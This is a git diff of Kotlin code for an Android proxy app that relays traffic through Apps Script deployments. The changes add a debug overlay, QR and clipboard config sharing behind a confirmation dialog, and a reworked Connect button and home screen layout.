+ * Draggable, semi-transparent, shown on top of all apps.
+ * Temporary — remove when pipelining is validated.
+ *
+ * Strictly best-effort: a failure to attach the window is logged and
+ * swallowed so this debug aid can never break the caller's start path.
+ */
+class PipelineDebugOverlay(private val context: Context) {
+
+    private val wm = context.getSystemService(Context.WINDOW_SERVICE) as WindowManager
+    private val handler = Handler(Looper.getMainLooper())
+
+    // Non-null only while the overlay window is attached. Volatile because
+    // hide() may be called off the main thread (MhrvVpnService calls it
+    // from teardown()) while poll()/applyJson() read it on the main looper.
+    @Volatile private var root: View? = null
+
+    private lateinit var tvElevated: TextView
+    private lateinit var tvBatches: TextView
+    private lateinit var tvEvents: TextView
+
+    // Delay between polls of Native.pipelineDebugJson(), in milliseconds.
+    private val pollInterval = 500L
+
+    /**
+     * Build the overlay view, attach it to the window manager and start
+     * polling. No-op when already shown. If attaching fails the error is
+     * logged, the overlay stays hidden and no polling is started.
+     */
+    fun show() {
+        if (root != null) return
+
+        val dp = { px: Int ->
+            TypedValue.applyDimension(TypedValue.COMPLEX_UNIT_DIP, px.toFloat(), context.resources.displayMetrics).toInt()
+        }
+
+        val layout = LinearLayout(context).apply {
+            orientation = LinearLayout.VERTICAL
+            setBackgroundColor(Color.argb(160, 0, 0, 0))
+            setPadding(dp(8), dp(6), dp(8), dp(6))
+        }
+
+        val titleTv = TextView(context).apply {
+            text = "Pipeline Debug"
+            setTextColor(Color.argb(220, 100, 255, 100))
+            textSize = 11f
+        }
+        layout.addView(titleTv)
+
+        tvElevated = TextView(context).apply {
+            setTextColor(Color.WHITE)
+            textSize = 10f
+        }
+        layout.addView(tvElevated)
+
+        tvBatches = TextView(context).apply {
+            setTextColor(Color.WHITE)
+            textSize = 10f
+        }
+        layout.addView(tvBatches)
+
+        tvEvents = TextView(context).apply {
+            setTextColor(Color.argb(200, 200, 200, 200))
+            textSize = 9f
+            maxLines = 8
+        }
+        layout.addView(tvEvents)
+
+        val params = WindowManager.LayoutParams(
+            WindowManager.LayoutParams.WRAP_CONTENT,
+            WindowManager.LayoutParams.WRAP_CONTENT,
+            WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
+            WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE or
+                WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
+            PixelFormat.TRANSLUCENT,
+        ).apply {
+            gravity = Gravity.TOP or Gravity.START
+            x = dp(8)
+            y = dp(80)
+        }
+
+        // Draggable: remember the window position and touch point on DOWN,
+        // then move the window by the finger's displacement on each MOVE.
+        var startX = 0
+        var startY = 0
+        var startTouchX = 0f
+        var startTouchY = 0f
+        layout.setOnTouchListener { _, event ->
+            when (event.action) {
+                MotionEvent.ACTION_DOWN -> {
+                    startX = params.x
+                    startY = params.y
+                    startTouchX = event.rawX
+                    startTouchY = event.rawY
+                    true
+                }
+                MotionEvent.ACTION_MOVE -> {
+                    params.x = startX + (event.rawX - startTouchX).toInt()
+                    params.y = startY + (event.rawY - startTouchY).toInt()
+                    wm.updateViewLayout(layout, params)
+                    true
+                }
+                else -> false
+            }
+        }
+
+        // Attach first and publish `root` only on success. Setting root
+        // before a failed addView would leave the overlay half-shown:
+        // later show() calls would be no-ops and the exception would
+        // propagate into whoever asked for a debug overlay.
+        try {
+            wm.addView(layout, params)
+        } catch (t: Throwable) {
+            android.util.Log.w("PipelineDebugOverlay", "addView failed: ${t.message}")
+            return
+        }
+        root = layout
+        schedulePoll()
+    }
+
+    /** Stop polling and detach the overlay window. Safe to call when not shown. */
+    fun hide() {
+        handler.removeCallbacksAndMessages(null)
+        root?.let {
+            try { wm.removeView(it) } catch (_: Throwable) {}
+        }
+        root = null
+    }
+
+    /** Queue the next poll() on the main looper after pollInterval ms. */
+    private fun schedulePoll() {
+        handler.postDelayed(::poll, pollInterval)
+    }
+
+    /**
+     * One polling tick, run on the main looper. The native snapshot is
+     * fetched on a short-lived background thread and the JSON is posted
+     * back to the main looper for rendering.
+     */
+    private fun poll() {
+        if (root == null) return
+        Thread {
+            try {
+                val json = Native.pipelineDebugJson()
+                handler.post { applyJson(json) }
+            } catch (_: Throwable) {}
+            // Re-arm only while still shown. A tick that slips past a
+            // concurrent hide() exits at the root check above.
+            if (root != null) schedulePoll()
+        }.start()
+    }
+
+    /**
+     * Render one JSON snapshot into the text views; called on the main
+     * looper via poll(). Blank input is ignored and parse errors are
+     * swallowed.
+     */
+    private fun applyJson(json: String) {
+        if (root == null) return
+        try {
+            if (json.isNotBlank()) {
+                val obj = JSONObject(json)
+                val elevated = obj.optInt("elevated", 0)
+                val maxElev = obj.optInt("max_elevated", 0)
+                val batches = obj.optInt("active_batches", 0)
+                val maxBatch = obj.optInt("max_batch_slots", 0)
+
+                val sessions = obj.optInt("active_sessions", 0)
+                tvElevated.text = "Sessions: $sessions  Elevated: $elevated / $maxElev"
+                tvBatches.text = "Batches: $batches / $maxBatch"
+
+                // One line per session: "<sid> d=<depth> f=<inflight>[ E]".
+                val sessArr = obj.optJSONArray("sessions")
+                val sessLines = if (sessArr != null && sessArr.length() > 0) {
+                    (0 until sessArr.length()).joinToString("\n") { i ->
+                        val s = sessArr.getJSONObject(i)
+                        val sid = s.optString("sid", "?")
+                        val d = s.optInt("depth", 0)
+                        val inf = s.optInt("inflight", 0)
+                        val e = if (s.optBoolean("elevated", false)) " E" else ""
+                        "$sid d=$d f=$inf$e"
+                    }
+                } else ""
+
+                // Only the last five entries of the events array are shown.
+                val arr = obj.optJSONArray("events")
+                val evtLines = if (arr != null && arr.length() > 0) {
+                    val start = maxOf(0, arr.length() - 5)
+                    (start until arr.length()).joinToString("\n") { arr.getString(it) }
+                } else ""
+
+                tvEvents.text = listOf(sessLines, evtLines).filter { it.isNotEmpty() }.joinToString("\n---\n")
+            }
+        } catch (_: Throwable) {}
+    }
+}
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
index b4de133d..537a67a1 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
@@ -61,11 +61,19 @@ fun AppPickerDialog(
     }
 
     val filtered: List<AppEntry> = remember(apps, query) {
-        if (query.isBlank()) apps
+        val base = if (query.isBlank()) apps
         else apps.filter {
             it.label.contains(query, ignoreCase = true) ||
                 it.packageName.contains(query, ignoreCase = true)
         }
+        // Pre-selected packages float to the top so the user can find what
+        // they already chose without scrolling the whole list. The sort
+        // key uses `initial` (the set passed when the dialog opened), not
+        // the live `selected` state — re-checking inside the dialog must
+        // not reorder rows under the user's finger. The new ordering takes
+        // effect the next time the dialog opens. Stable sort preserves
+        // the alphabetical-by-label order within each group.
+        base.sortedByDescending { it.packageName in initial }
     }
 
     AlertDialog(
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt
new file mode 100644
index 00000000..966030ca
--- /dev/null
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt
@@ -0,0 +1,319 @@
+package com.therealaleph.mhrv.ui
+
+import android.app.Activity
+import android.graphics.Bitmap
+import android.graphics.Color
+import androidx.activity.compose.rememberLauncherForActivityResult
+import androidx.activity.result.contract.ActivityResultContracts
+import androidx.compose.foundation.Image
+import androidx.compose.foundation.layout.*
+import androidx.compose.foundation.rememberScrollState
+import androidx.compose.foundation.verticalScroll
+import androidx.compose.material.icons.Icons
+import androidx.compose.material.icons.filled.ContentPaste
+import androidx.compose.material.icons.filled.QrCode
+import androidx.compose.material.icons.filled.QrCodeScanner
+import androidx.compose.material.icons.filled.Share
+import androidx.compose.material3.*
+import androidx.compose.runtime.*
+import androidx.compose.ui.Alignment
+import androidx.compose.ui.Modifier
+import androidx.compose.ui.graphics.asImageBitmap
+import androidx.compose.ui.platform.LocalClipboardManager
+import androidx.compose.ui.platform.LocalContext
+import androidx.compose.ui.res.stringResource
+import androidx.compose.ui.text.AnnotatedString
+import androidx.compose.ui.unit.dp
+import androidx.compose.ui.window.Dialog
+import com.google.zxing.BarcodeFormat
+import com.google.zxing.qrcode.QRCodeWriter
+import com.journeyapps.barcodescanner.ScanContract
+import com.journeyapps.barcodescanner.ScanOptions
+import com.therealaleph.mhrv.ConfigStore
+import com.therealaleph.mhrv.MhrvConfig
+import androidx.compose.foundation.text.selection.SelectionContainer
+import com.therealaleph.mhrv.R
+import kotlinx.coroutines.launch
+
+// =========================================================================
+// Import/Export bar — shown at the top of the config screen.
+// =========================================================================
+
+/**
+ * Import/export row for the config screen: export dialog (QR + encoded text),
+ * paste from clipboard, and QR scan. Every import path, including a pending
+ * deep link, goes through [ImportConfirmDialog] before [onImport] is called.
+ * @param cfg current config; encoded when the export dialog is shown.
+ * @param onImport invoked with the decoded config once the user confirms.
+ * @param onSnackbar suspending callback used to surface status messages.
+ */
+@Composable
+fun ConfigSharingBar(
+    cfg: MhrvConfig,
+    onImport: (MhrvConfig) -> Unit,
+    onSnackbar: suspend (String) -> Unit,
+) {
+    // Deep link import — requires confirmation before applying. Snapshot the
+    // value so the callbacks never `!!` state an earlier tap already cleared.
+    val deepLinkState = com.therealaleph.mhrv.MainActivity.pendingDeepLinkConfig
+    val deepLinkCfg = deepLinkState.value
+    if (deepLinkCfg != null) {
+        ImportConfirmDialog(
+            cfg = deepLinkCfg,
+            onConfirm = {
+                onImport(deepLinkCfg)
+                deepLinkState.value = null
+            },
+            onDismiss = { deepLinkState.value = null },
+        )
+    }
+    val ctx = LocalContext.current
+    val clipboard = LocalClipboardManager.current
+    val scope = rememberCoroutineScope()
+
+    var showExportDialog by remember { mutableStateOf(false) }
+    var showImportConfirm by remember { mutableStateOf(false) }
+    var pendingImport by remember { mutableStateOf<MhrvConfig?>(null) }
+
+    // Shared by paste and scan: stage a decodable config, else report it invalid.
+    fun stageImport(raw: String) {
+        val decoded = ConfigStore.decode(raw)
+        if (decoded != null) {
+            pendingImport = decoded
+            showImportConfirm = true
+        } else {
+            scope.launch { onSnackbar(ctx.getString(R.string.snack_invalid_config)) }
+        }
+    }
+
+    // QR scanner launcher — fires the ZXing embedded scanner activity.
+    val scanLauncher = rememberLauncherForActivityResult(ScanContract()) { result ->
+        result.contents?.let { stageImport(it) }
+    }
+
+    // --- Export + Paste + Scan row ---
+    Row(
+        modifier = Modifier.fillMaxWidth(),
+        horizontalArrangement = Arrangement.spacedBy(8.dp),
+    ) {
+        IconButton(onClick = { showExportDialog = true }) {
+            Icon(Icons.Default.Share, contentDescription = stringResource(R.string.btn_export_config))
+        }
+        // Manual paste — reads clipboard on tap. Android 13+ restricts
+        // background clipboard access, so auto-detect doesn't work.
+        // User interaction (tap) grants clipboard permission.
+        OutlinedButton(onClick = { stageImport(clipboard.getText()?.text.orEmpty()) }) {
+            Icon(Icons.Default.ContentPaste, null, modifier = Modifier.size(18.dp))
+            Spacer(Modifier.width(4.dp))
+            Text("Paste")
+        }
+        OutlinedButton(
+            onClick = {
+                val opts = ScanOptions().apply {
+                    setDesiredBarcodeFormats(ScanOptions.QR_CODE)
+                    setPrompt("Scan mhrv config QR code")
+                    setBeepEnabled(false)
+                    setOrientationLocked(true)
+                }
+                scanLauncher.launch(opts)
+            },
+        ) {
+            Icon(Icons.Default.QrCodeScanner, null, modifier = Modifier.size(18.dp))
+            Spacer(Modifier.width(4.dp))
+            Text(stringResource(R.string.btn_scan_qr))
+        }
+    }
+
+    // --- Export dialog (QR + hash + copy in one) ---
+    if (showExportDialog) {
+        val encoded = remember(cfg) { ConfigStore.encode(cfg) }
+        val qrBitmap = remember(encoded) { generateQr(encoded, 512) }
+        Dialog(onDismissRequest = { showExportDialog = false }) {
+            Card(modifier = Modifier.padding(16.dp)) {
+                Column(
+                    modifier = Modifier
+                        .padding(24.dp)
+                        .verticalScroll(rememberScrollState()),
+                    horizontalAlignment = Alignment.CenterHorizontally,
+                    verticalArrangement = Arrangement.spacedBy(12.dp),
+                ) {
+                    Text(
+                        stringResource(R.string.dialog_export_title),
+                        style = MaterialTheme.typography.titleMedium,
+                    )
+                    Text(
+                        stringResource(R.string.dialog_export_warning),
+                        style = MaterialTheme.typography.bodySmall,
+                        color = MaterialTheme.colorScheme.error,
+                    )
+
+                    // QR code
+                    if (qrBitmap != null) {
+                        Image(
+                            bitmap = qrBitmap.asImageBitmap(),
+                            contentDescription = "QR code",
+                            modifier = Modifier.size(260.dp),
+                        )
+                    } else {
+                        Text("Config too large for QR code", style = MaterialTheme.typography.bodySmall)
+                    }
+
+                    // Hash with copy button
+                    Row(
+                        modifier = Modifier.fillMaxWidth(),
+                        verticalAlignment = Alignment.CenterVertically,
+                    ) {
+                        SelectionContainer(modifier = Modifier.weight(1f)) {
+                            Text(
+                                encoded,
+                                style = MaterialTheme.typography.bodySmall,
+                                maxLines = 3,
+                                overflow = androidx.compose.ui.text.style.TextOverflow.Ellipsis,
+                            )
+                        }
+                        IconButton(onClick = {
+                            clipboard.setText(AnnotatedString(encoded))
+                            scope.launch { onSnackbar(ctx.getString(R.string.snack_config_copied)) }
+                        }) {
+                            Icon(
+                                Icons.Default.ContentPaste,
+                                contentDescription = stringResource(R.string.btn_copy),
+                                modifier = Modifier.size(20.dp),
+                            )
+                        }
+                    }
+
+                    // Action buttons
+                    Row(
+                        modifier = Modifier.fillMaxWidth(),
+                        horizontalArrangement = Arrangement.spacedBy(8.dp, Alignment.CenterHorizontally),
+                    ) {
+                        OutlinedButton(onClick = {
+                            val textOnly = android.content.Intent(android.content.Intent.ACTION_SEND).apply {
+                                type = "text/plain"
+                                putExtra(android.content.Intent.EXTRA_TEXT, encoded)
+                            }
+                            // Save QR bitmap to cache dir and share both image + text.
+                            // Writing the PNG or resolving its FileProvider URI can
+                            // throw; fall back to text-only instead of crashing.
+                            val intent = if (qrBitmap == null) textOnly else try {
+                                val file = java.io.File(ctx.cacheDir, "mhrv-config-qr.png")
+                                file.outputStream().use { qrBitmap.compress(Bitmap.CompressFormat.PNG, 100, it) }
+                                val uri = androidx.core.content.FileProvider.getUriForFile(
+                                    ctx, "${ctx.packageName}.fileprovider", file
+                                )
+                                android.content.Intent(android.content.Intent.ACTION_SEND).apply {
+                                    type = "image/png"
+                                    putExtra(android.content.Intent.EXTRA_STREAM, uri)
+                                    putExtra(android.content.Intent.EXTRA_TEXT, encoded)
+                                    addFlags(android.content.Intent.FLAG_GRANT_READ_URI_PERMISSION)
+                                }
+                            } catch (_: Exception) {
+                                textOnly
+                            }
+                            ctx.startActivity(android.content.Intent.createChooser(intent, "Share config"))
+                        }) {
+                            Icon(Icons.Default.Share, null, modifier = Modifier.size(18.dp))
+                            Spacer(Modifier.width(4.dp))
+                            Text("Share")
+                        }
+                        TextButton(onClick = { showExportDialog = false }) { Text("Close") }
+                    }
+                }
+            }
+        }
+    }
+
+    // --- Import confirmation dialog (clipboard + QR scan) ---
+    val toImport = pendingImport
+    if (showImportConfirm && toImport != null) {
+        ImportConfirmDialog(
+            cfg = toImport,
+            onConfirm = {
+                onImport(toImport)
+                clipboard.setText(AnnotatedString(""))
+                showImportConfirm = false
+                pendingImport = null
+                scope.launch { onSnackbar(ctx.getString(R.string.snack_config_imported)) }
+            },
+            onDismiss = {
+                showImportConfirm = false
+                pendingImport = null
+            },
+        )
+    }
+}
+
+// =========================================================================
+// Import confirmation dialog — shared by clipboard, QR scan, and deep link.
+// Shows deployment IDs, mode, and a trust warning before overwriting config.
+// =========================================================================
+
+/**
+ * Confirmation prompt for a decoded config. Shows a trust warning, the mode,
+ * the deployment count, and the first three deployment IDs (first 20 characters
+ * of each); [onConfirm] and [onDismiss] report the user's choice.
+ */
+@Composable
+private fun ImportConfirmDialog(
+    cfg: MhrvConfig,
+    onConfirm: () -> Unit,
+    onDismiss: () -> Unit,
+) {
+    // Keep only the ID segment after "/macros/s/"; URLs without it pass through as-is.
+    val idMarker = "/macros/s/"
+    val deploymentIds = cfg.appsScriptUrls
+        .map { if (idMarker in it) it.substringAfter(idMarker).substringBefore("/") else it }
+        .map { it.trim() }
+        .filter { it.isNotEmpty() }
+    val idPreview = deploymentIds.take(3).joinToString("\n") { id -> "  ${id.take(20)}…" }
+    val modeName = when (cfg.mode) {
+        com.therealaleph.mhrv.Mode.APPS_SCRIPT -> "apps_script"
+        com.therealaleph.mhrv.Mode.DIRECT -> "direct"
+        com.therealaleph.mhrv.Mode.FULL -> "full"
+    }
+
+    AlertDialog(
+        onDismissRequest = onDismiss,
+        title = { Text(stringResource(R.string.dialog_import_title)) },
+        text = {
+            Column(verticalArrangement = Arrangement.spacedBy(8.dp)) {
+                Text(
+                    "Importing routes your traffic through the deployment IDs in this config. Only import from trusted sources.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.error,
+                )
+                Text(
+                    "Mode: $modeName\nDeployments: ${deploymentIds.size}\n$idPreview",
+                    style = MaterialTheme.typography.bodySmall,
+                )
+                Text(stringResource(R.string.dialog_import_body), style = MaterialTheme.typography.bodySmall)
+            }
+        },
+        confirmButton = { TextButton(onClick = onConfirm) { Text("Import") } },
+        dismissButton = {
+            TextButton(onClick = onDismiss) { Text(stringResource(R.string.btn_cancel)) }
+        },
+    )
+}
+
+// =========================================================================
+// QR code generation
+// =========================================================================
+
+/** Renders [content] as a [size]×[size] QR bitmap, or null on any failure (e.g. content too large). */
+private fun generateQr(content: String, size: Int): Bitmap? {
+    return try {
+        val matrix = QRCodeWriter().encode(content, BarcodeFormat.QR_CODE, size, size)
+        // Fill a row-major pixel buffer and blit once instead of size² setPixel calls.
+        val pixels = IntArray(size * size) { i ->
+            if (matrix[i % size, i / size]) Color.BLACK else Color.WHITE
+        }
+        Bitmap.createBitmap(size, size, Bitmap.Config.RGB_565).apply {
+            setPixels(pixels, 0, size, 0, 0, size, size)
+        }
+    } catch (_: Throwable) {
+        null // Config too large for QR
+    }
+}
+
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
index dd69ffda..b06bc5cf 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
@@ -1,5 +1,6 @@
 package com.therealaleph.mhrv.ui
 
+import android.widget.Toast
 import androidx.compose.animation.AnimatedVisibility
 import androidx.compose.foundation.background
 import androidx.compose.foundation.layout.*
@@ -9,6 +10,7 @@ import androidx.compose.foundation.lazy.rememberLazyListState
 import androidx.compose.foundation.rememberScrollState
 import androidx.compose.foundation.shape.RoundedCornerShape
 import androidx.compose.foundation.text.KeyboardOptions
+import androidx.compose.foundation.text.selection.SelectionContainer
 import androidx.compose.foundation.verticalScroll
 import androidx.compose.material.icons.Icons
 import androidx.compose.material.icons.filled.CheckCircle
@@ -23,7 +25,9 @@ import androidx.compose.runtime.saveable.rememberSaveable
 import androidx.compose.ui.Alignment
 import androidx.compose.ui.Modifier
 import androidx.compose.ui.draw.clip
+import androidx.compose.ui.platform.LocalClipboardManager
 import androidx.compose.ui.platform.LocalContext
+import androidx.compose.ui.text.AnnotatedString
 import androidx.compose.ui.text.font.FontFamily
 import androidx.compose.ui.text.input.ImeAction
 import androidx.compose.ui.text.input.KeyboardType
@@ -46,8 +50,10 @@ import com.therealaleph.mhrv.ui.theme.ErrRed
 import com.therealaleph.mhrv.ui.theme.OkGreen
 import kotlinx.coroutines.Dispatchers
 import kotlinx.coroutines.delay
+import kotlinx.coroutines.flow.first
 import kotlinx.coroutines.launch
 import kotlinx.coroutines.withContext
+import kotlinx.coroutines.withTimeoutOrNull
 import org.json.JSONObject
 
 /**
@@ -69,9 +75,11 @@ sealed class CaInstallOutcome {
 /**
  * Top-level screen. Intentionally one scrollable page rather than tabs —
  * first-run users need to see everything (deployment IDs, cert button,
- * Start) on one surface. Anything that isn't first-run critical lives in
- * collapsible sections (SNI pool, Advanced, Logs) so the default view
- * stays short.
+ * Connect) on one surface. The Connect/Disconnect button sits right under
+ * the Mode dropdown so a long deployment-ID list can't push it off-screen
+ * for daily-use taps. Anything that isn't first-run critical (Apps Script
+ * setup once filled, SNI pool, Advanced, Logs) lives in collapsible
+ * sections so the default view stays short.
  */
 @OptIn(ExperimentalMaterial3Api::class)
 @Composable
@@ -122,18 +130,31 @@ fun HomeScreen(
         }
     }
 
-    // Cooldown on Start/Stop. Rapid taps during a VPN transition trigger
-    // an emulator-specific EGL renderer crash
-    // (F OpenGLRenderer: EGL_NOT_INITIALIZED during rendering) — the
-    // service survives, but the Compose UI process dies and the app
-    // appears to close. On real hardware this is rare, but debouncing
-    // is useful UX anyway: neither start nor stop is truly instant,
-    // and the user gets no feedback if they tap while one is in flight.
-    var transitionCooldown by remember { mutableStateOf(false) }
-    LaunchedEffect(transitionCooldown) {
-        if (transitionCooldown) {
-            delay(2000)
-            transitionCooldown = false
+    // Gate Start/Stop on the service's actual state transition rather
+    // than a fixed timer. The previous 2s cooldown was shorter than the
+    // worst-case teardown (Tun2proxy.stop + 4s join + 5s rt.shutdown_timeout
+    // ≈ 9s on the slowest path), which let the user fire a fresh Connect
+    // while the previous Stop's native cleanup was still releasing the
+    // listener port — the new startProxy then failed with "Address already
+    // in use".
+    //
+    // `awaitingRunning` holds the value we expect VpnState.isRunning to
+    // settle on after the user's action; null means "no transition in
+    // flight". The LaunchedEffect below suspends on the StateFlow until
+    // the predicate matches, with a 12s backstop in case the service
+    // failed before flipping the flag (e.g., establish() returned null).
+    // Side benefit: this also debounces the rapid-tap EGL renderer crash
+    // the old timer was guarding against.
+    var awaitingRunning by remember { mutableStateOf<Boolean?>(null) }
+    val transitioning = awaitingRunning != null
+    LaunchedEffect(awaitingRunning) {
+        val target = awaitingRunning ?: return@LaunchedEffect
+        try {
+            withTimeoutOrNull(12_000) {
+                VpnState.isRunning.first { it == target }
+            }
+        } finally {
+            awaitingRunning = null
         }
     }
 
@@ -229,34 +250,124 @@ fun HomeScreen(
                 .padding(16.dp),
             verticalArrangement = Arrangement.spacedBy(12.dp),
         ) {
+            // Config import/export bar — paste from clipboard + export + QR.
+            ConfigSharingBar(
+                cfg = cfg,
+                onImport = { persist(it) },
+                onSnackbar = { snackbar.showSnackbar(it) },
+            )
+
             SectionHeader("Mode")
             ModeDropdown(
                 mode = cfg.mode,
                 onChange = { persist(cfg.copy(mode = it)) },
             )
 
+            // Connect/Disconnect lives right under Mode so users with a long
+            // deployment-ID list don't have to scroll past it on every
+            // session. Disabled state still acts as the "you're not set up
+            // yet" signal — they'll expand the Apps Script section below to
+            // resolve it.
+            val isVpnRunning by VpnState.isRunning.collectAsState()
+            Button(
+                onClick = {
+                    if (isVpnRunning) {
+                        awaitingRunning = false
+                        onStop()
+                    } else {
+                        awaitingRunning = true
+                        // Connect flow: auto-resolve google_ip so we don't
+                        // hand the proxy a stale anycast target; repair
+                        // front_domain if it got corrupted into an IP
+                        // (SNI has to be a hostname); then fire onStart.
+                        // All three steps go through the Compose persist()
+                        // so a subsequent field edit can't overwrite the
+                        // fresh values with pre-resolve ones.
+                        scope.launch {
+                            // Only auto-fill google_ip if it's empty.
+                            // Issue #71: some Iranian ISPs return
+                            // poisoned A records for www.google.com that
+                            // resolve but then refuse TLS (or route to a
+                            // Google IP that's not on the GFE and can't
+                            // handle our SNI-rewrite). If the user has
+                            // manually set a working IP
+                            // (e.g. 216.239.38.120), we must NOT
+                            // overwrite it with a poisoned fresh lookup
+                            // just because the two values differ. They
+                            // can still force a re-resolve via the
+                            // explicit "Auto-detect" button above.
+                            var updated = cfg
+                            if (updated.googleIp.isBlank()) {
+                                val fresh = withContext(Dispatchers.IO) {
+                                    NetworkDetect.resolveGoogleIp()
+                                }
+                                if (!fresh.isNullOrBlank()) {
+                                    updated = updated.copy(googleIp = fresh)
+                                }
+                            }
+                            if (updated.frontDomain.isBlank() ||
+                                updated.frontDomain.parseAsIpOrNull() != null
+                            ) {
+                                updated = updated.copy(frontDomain = "www.google.com")
+                            }
+                            if (updated !== cfg) persist(updated)
+                            onStart()
+                        }
+                    }
+                },
+                enabled = (isVpnRunning ||
+                    cfg.mode == Mode.DIRECT ||
+                    (cfg.hasDeploymentId && cfg.authKey.isNotBlank())) && !transitioning,
+                colors = ButtonDefaults.buttonColors(
+                    containerColor = if (isVpnRunning) ErrRed else OkGreen,
+                    contentColor = androidx.compose.ui.graphics.Color.White,
+                    disabledContainerColor = MaterialTheme.colorScheme.surfaceVariant,
+                ),
+                modifier = Modifier
+                    .fillMaxWidth()
+                    .heightIn(min = 52.dp),
+            ) {
+                Text(
+                    when {
+                        transitioning -> "…"
+                        isVpnRunning -> stringResource(R.string.btn_disconnect)
+                        else -> stringResource(R.string.btn_connect)
+                    },
+                    style = MaterialTheme.typography.titleMedium,
+                )
+            }
+
             Spacer(Modifier.height(4.dp))
-            SectionHeader(stringResource(R.string.sec_apps_script_relay))
 
             val appsScriptEnabled = cfg.mode == Mode.APPS_SCRIPT || cfg.mode == Mode.FULL
-            DeploymentIdsField(
-                urls = cfg.appsScriptUrls,
-                onChange = { persist(cfg.copy(appsScriptUrls = it)) },
-                enabled = appsScriptEnabled,
-            )
+            // Wrapped in a collapsible so a long ID list (10+ deployments
+            // is normal in full-tunnel rotations) doesn't dominate the
+            // screen once it's set up. Starts expanded for first-run users
+            // (no IDs/key yet) so the form is immediately discoverable.
+            CollapsibleSection(
+                title = stringResource(R.string.sec_apps_script_relay),
+                initiallyExpanded = appsScriptEnabled &&
+                    (cfg.appsScriptUrls.isEmpty() || cfg.authKey.isBlank()),
+            ) {
+                DeploymentIdsField(
+                    urls = cfg.appsScriptUrls,
+                    onChange = { persist(cfg.copy(appsScriptUrls = it)) },
+                    enabled = appsScriptEnabled,
+                )
 
-            OutlinedTextField(
-                value = cfg.authKey,
-                onValueChange = { persist(cfg.copy(authKey = it)) },
-                label = { Text(stringResource(R.string.field_auth_key)) },
-                singleLine = true,
-                enabled = appsScriptEnabled,
-                keyboardOptions = KeyboardOptions(imeAction = ImeAction.Next),
-                modifier = Modifier.fillMaxWidth(),
-                supportingText = {
-                    Text(stringResource(R.string.help_auth_key))
-                },
-            )
+                OutlinedTextField(
+                    value = cfg.authKey,
+                    onValueChange = { persist(cfg.copy(authKey = it)) },
+                    label = { Text(stringResource(R.string.field_auth_key)) },
+                    singleLine = true,
+                    enabled = appsScriptEnabled,
+                    keyboardOptions = KeyboardOptions(imeAction = ImeAction.Next),
+                    modifier = Modifier.fillMaxWidth(),
+                    supportingText = {
+                        Text(stringResource(R.string.help_auth_key))
+                    },
+                )
+            }
 
             Spacer(Modifier.height(4.dp))
             SectionHeader(stringResource(R.string.sec_network))
@@ -360,89 +471,10 @@ fun HomeScreen(
             }
 
             Spacer(Modifier.height(8.dp))
-
-            // Unified Connect/Disconnect button. Color + label track the
-            // service's real "is it running right now" state (via
-            // `VpnState.isRunning`), so the UI never shows "Connect" while
-            // the tunnel is still up or "Disconnect" after the service
-            // finished tearing down. Two tap paths, one button:
-            //   - running=false → green "Connect" → runs the auto-resolve
-            //     + persist + onStart() sequence we used to hang off the
-            //     old Start button.
-            //   - running=true  → red "Disconnect" → fires onStop().
-            val isVpnRunning by VpnState.isRunning.collectAsState()
-            Button(
-                onClick = {
-                    transitionCooldown = true
-                    if (isVpnRunning) {
-                        onStop()
-                    } else {
-                        // Connect flow: auto-resolve google_ip so we don't
-                        // hand the proxy a stale anycast target; repair
-                        // front_domain if it got corrupted into an IP
-                        // (SNI has to be a hostname); then fire onStart.
-                        // All three steps go through the Compose persist()
-                        // so a subsequent field edit can't overwrite the
-                        // fresh values with pre-resolve ones.
-                        scope.launch {
-                            // Only auto-fill google_ip if it's empty.
-                            // Issue #71: some Iranian ISPs return
-                            // poisoned A records for www.google.com that
-                            // resolve but then refuse TLS (or route to a
-                            // Google IP that's not on the GFE and can't
-                            // handle our SNI-rewrite). If the user has
-                            // manually set a working IP
-                            // (e.g. 216.239.38.120), we must NOT
-                            // overwrite it with a poisoned fresh lookup
-                            // just because the two values differ. They
-                            // can still force a re-resolve via the
-                            // explicit "Auto-detect" button above.
-                            var updated = cfg
-                            if (updated.googleIp.isBlank()) {
-                                val fresh = withContext(Dispatchers.IO) {
-                                    NetworkDetect.resolveGoogleIp()
-                                }
-                                if (!fresh.isNullOrBlank()) {
-                                    updated = updated.copy(googleIp = fresh)
-                                }
-                            }
-                            if (updated.frontDomain.isBlank() ||
-                                updated.frontDomain.parseAsIpOrNull() != null
-                            ) {
-                                updated = updated.copy(frontDomain = "www.google.com")
-                            }
-                            if (updated !== cfg) persist(updated)
-                            onStart()
-                        }
-                    }
-                },
-                enabled = (isVpnRunning ||
-                    cfg.mode == Mode.GOOGLE_ONLY ||
-                    (cfg.hasDeploymentId && cfg.authKey.isNotBlank())) && !transitionCooldown,
-                colors = ButtonDefaults.buttonColors(
-                    containerColor = if (isVpnRunning) ErrRed else OkGreen,
-                    contentColor = androidx.compose.ui.graphics.Color.White,
-                    disabledContainerColor = MaterialTheme.colorScheme.surfaceVariant,
-                ),
-                modifier = Modifier
-                    .fillMaxWidth()
-                    .heightIn(min = 52.dp),
-            ) {
-                Text(
-                    when {
-                        transitionCooldown -> "…"
-                        isVpnRunning -> stringResource(R.string.btn_disconnect)
-                        else -> stringResource(R.string.btn_connect)
-                    },
-                    style = MaterialTheme.typography.titleMedium,
-                )
-            }
-
-            Spacer(Modifier.height(4.dp))
-            // Secondary accent button — FilledTonalButton reads as a lower-
-            // priority action next to Start/Stop, matching the desktop UI's
-            // visual hierarchy where Install CA is offered as a helper
-            // button rather than the headline action.
